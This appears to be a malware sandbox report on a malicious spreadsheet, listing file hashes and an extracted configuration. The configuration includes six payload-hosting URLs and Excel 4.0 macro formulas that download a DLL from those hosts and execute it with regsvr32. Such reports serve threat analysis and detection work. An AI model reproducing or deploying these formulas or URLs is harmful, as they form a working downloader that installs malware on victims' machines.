General
-
Target
b40b78ae542f9fd8dd80f9106d8d8f96f302c192dafd135d4f1261ab946e22ce
-
Size
29KB
-
MD5
145f26a025c0724f5b1018d4c0a55c81
-
SHA1
23edeac114b50335b0724d72bbc2b41c5da38c67
-
SHA256
b40b78ae542f9fd8dd80f9106d8d8f96f302c192dafd135d4f1261ab946e22ce
-
SHA512
8d129ad5fc2db995441cc42d55278312367d222781c5b3079807465cf4775b1dfd41888999e0195011c689b6ccd2b7ec9b00b3a5402172da6a5e2c2a27d319ec
-
SSDEEP
768:bCFdOVj2obFO4x+Z4QhkhlGqHmPA41u8YbUfpXuXDDQ/t:2Fd6qycZ4Qhkaem40vfhsIt
Malware Config
Extracted
https://www.doh-designsection.com/Files/LXZv9wBqLH/
https://www.centurypapers.com/database-wordpres/VDYOi/
http://draheimdesign.com/allyears_jdrf_video/DZEUcZ5/
http://fontecmobile.com/pk/tRqU7/
http://dunyaaslan.com/cgi-bin/IwvOXl/
http://dusangerzicgera.com/img/4v7QHP/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.doh-designsection.com/Files/LXZv9wBqLH/","..\xewn.dll",0,0) =IF('PIMKE'!C14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.centurypapers.com/database-wordpres/VDYOi/","..\xewn.dll",0,0)) =IF('PIMKE'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://draheimdesign.com/allyears_jdrf_video/DZEUcZ5/","..\xewn.dll",0,0)) =IF('PIMKE'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://fontecmobile.com/pk/tRqU7/","..\xewn.dll",0,0)) =IF('PIMKE'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://dunyaaslan.com/cgi-bin/IwvOXl/","..\xewn.dll",0,0)) =IF('PIMKE'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://dusangerzicgera.com/img/4v7QHP/","..\xewn.dll",0,0)) =IF('PIMKE'!C24<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll") =RETURN()
Signatures
Files
-
b40b78ae542f9fd8dd80f9106d8d8f96f302c192dafd135d4f1261ab946e22ce